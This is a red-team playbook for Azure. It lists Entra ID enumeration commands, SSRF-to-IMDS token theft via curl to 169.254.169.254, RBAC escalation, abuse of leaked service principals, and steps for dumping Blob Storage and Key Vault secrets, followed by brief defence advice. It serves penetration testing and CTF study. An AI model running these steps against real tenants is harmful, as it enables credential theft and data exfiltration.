Azure
This playbook provides red teaming methodology for Azure environments. It covers: Azure cloud fundamentals, enumeration and exploitation techniques, real-world CTF-style scenarios, commands and tools
1. Azure Cloud Overview
Core Components
Azure Active Directory (AAD / Entra ID) – Identity & Access Management (users, groups, roles, service principals, managed identities).
Azure Resource Manager (ARM) – Control plane for deploying, managing, securing resources.
Office 365 / M365 – Productivity suite, integrated with AAD.
Cloud Spaces
Control Plane: ARM API, Azure Portal, PowerShell, CLI.
Data Plane: Actual resources (VMs, Blob Storage, Functions, etc.).
Identity Plane: AAD identities, tokens, RBAC.
2. Authentication in Azure
Methods
Username & Password (long-term)
az login Connect-AzAccount Connect-MgGraph -Scopes "Directory.Read.All"
Service Principal (App ID + Secret/Cert)
az login --service-principal -u <AppID> -p <Password> --tenant <TenantID> $cred = Get-Credential # AppID + Secret Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
Access Token (short-term)
az account get-access-token --resource=https://management.azure.com Connect-AzAccount -AccessToken <AAD_AccessToken>
Instance Metadata Service (IMDS) – Auto-issued tokens inside VMs
curl -H "Metadata:true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Concept: IMDS
169.254.169.254
= internal IP for Azure metadata.Exposes OAuth2 tokens for Managed Identity.
Exploitable via SSRF or local compromise.
IMDSv1: No session binding → SSRF-prone.
IMDSv2 (work in progress for Azure, stronger binding).
3. Enumeration Phase
AAD Discovery
Check if target org uses Entra ID:
curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
List current session:
Get-MgContext
Enumerate roles:
Get-MgDirectoryRole | ConvertTo-Json Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
Enumerate users & groups:
Get-MgUser Get-MgUserMemberOf -UserId <UserID> Get-MgGroup Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
Applications / Service Principals:
Get-MgApplication Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json
4. Exploitation Scenarios
4.1 SSRF → IMDS Token Theft
Find SSRF in a web app on Azure VM.
Target IMDS endpoint:
curl -H "Metadata:true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
→ Returns access token for Microsoft Graph API.
Configure with stolen creds:
az account get-access-token --resource https://graph.microsoft.com Connect-AzAccount -AccessToken <Token>
Enumerate tenant, users, groups with Graph API.
4.2 ARM Token Abuse
Request ARM-scoped token from IMDS:
curl -H "Metadata:true" \ "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
Enumerate resources:
az vm list --output table az storage account list --output table
4.3 Privilege Escalation via RBAC
List roles:
az role assignment list --all
If attacker has Owner/Contributor → can create new role or assign higher privileges.
Example: Attach
User Access Administrator
→ take over.
4.4 Service Principal Abuse
If SP creds are leaked (from GitHub, etc.):
az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
Check assigned roles → escalate or pivot.
5. Post-Exploitation
Dump data from Blob Storage:
az storage blob list --account-name <storage> --container-name <container> az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
Enumerate Key Vault secrets:
az keyvault secret list --vault-name <vault> az keyvault secret show --vault-name <vault> --name <secret>
6. Lateral Movement
Use stolen tokens to pivot tenants/subscriptions.
Exploit custom role definitions to gain indirect access.
Example scenario from CTF (generalized):
Attacker compromises VM → retrieves IMDS token.
Token has Reader role at subscription level.
However, token also has custom role at VM resource scope → allows reading group info.
From there, attacker enumerates applications and pivots via Graph API.
7. Detection & Defense
Enable Azure AD logs & alerts: Monitor anomalous logins, token use.
Restrict IMDS exposure: Disable public endpoints, enforce network rules.
Use Conditional Access: Restrict Graph API access by location/device.
RBAC Hardening: Audit custom roles, remove broad assignments.
Key Vault: Enable firewall & access policies.
Last updated